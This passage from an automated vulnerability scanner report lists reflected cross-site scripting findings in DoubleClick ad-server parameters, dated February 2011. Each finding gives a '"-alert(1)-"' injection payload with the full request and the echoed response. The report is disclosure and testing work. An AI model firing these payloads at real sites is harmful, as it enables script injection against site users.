Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:16:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7943

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
nzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXKedc03"-alert(1)-"53df0e3547dhttp://www.adobe.com/products/photoshop/photoshop/?sdid=IEFXK");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var ope
...[SNIP]...

1.15. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6b10"-alert(1)-"313bfda1deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4961

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/6c/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=&a6b10"-alert(1)-"313bfda1deb=1http%3a%2f%2fwww.nutrisystem.com/jsps_hmr/tracking/click.jsp%3Fiid%3D29572%26rURL%3D/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var o
...[SNIP]...

1.16. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.382

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588b5"-alert(1)-"bbb21bc460e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=145238134?click=http://clk.atdmt.com/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/270694586/direct;wi.300;hi.250/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 02:13:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4924

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
.net/click%3Bh%3Dv8/3aae/7/69/%2a/f%3B235359689%3B0-0%3B0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3B%3B%7Esscs%3D%3fhttp://clk.redcated/goiframe/196247526.198101849/270694586/direct/01%3fhref=588b5"-alert(1)-"bbb21bc460ehttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

1.17. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47f2"-alert(1)-"54049c07273 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7835
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 13:21:34 GMT
Expires: Mon, 14 Feb 2011 13:21:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
GFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=c47f2"-alert(1)-"54049c07273http://embassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml?WT.mc_id=z1ECNCAA2ES3D4H5MoreReason40543&cssiteid=1004575&csdartid=5784169940013199");
var fscUrl = url;
var fscUr
...[SNIP]...

1.18. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1417b"-alert(1)-"b9c926877f7 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ1417b"-alert(1)-"b9c926877f7&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4
...[SNIP]...

1.19. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 230d9"-alert(1)-"981c7121fd4 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7887

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912230d9"-alert(1)-"981c7121fd4&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csdartid%3D5784169940013170");
var
...[SNIP]...

1.20. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb08b"-alert(1)-"4523e8dc99a was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1eb08b"-alert(1)-"4523e8dc99a&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5More
...[SNIP]...

1.21. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 862c5"-alert(1)-"b9cec4b80de was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:21:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g862c5"-alert(1)-"b9cec4b80de&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fembassysuites.hilton.com/en/es/promotions/es_morereasonstostay_pt/index.jhtml%3FWT.mc_id%3Dz1ECNCAA2ES3D4H5MoreReason40543%26cssiteid%3D1004575%26csda
...[SNIP]...

1.22. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5035359.26 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5035359.26

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e7f3"-alert(1)-"8abaf15a711 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5035359.26;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2UtaG95dGxsYy5odG2YAugCuAIYwAIGyALxj7oWqAMB6AO6AugD4gX1AwAAAMQ&num=1&sig=AGiWqtxkJIBXuihO1k2jgZRuF_3PjfgZ4g&client=ca-pub-4063878933780912&adurl=;ord=874593558? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1297711267&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fexploits%2Fenterprise-exploit-coverage-hoytllc.htm&dt=1297689667883&shv=r20101117&jsv=r20110208&saldr=1&correlator=1297689667905&frm=0&adk=200505236&ga_vid=1027971351.1297689668&ga_sid=1297689668&ga_hid=1219644194&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&dff=times%20new%20roman&dfs=16&biw=1112&bih=1010&eid=33895299&fu=0&ifi=1&dtd=50&xpc=g179VgxXiq&p=file%3A//
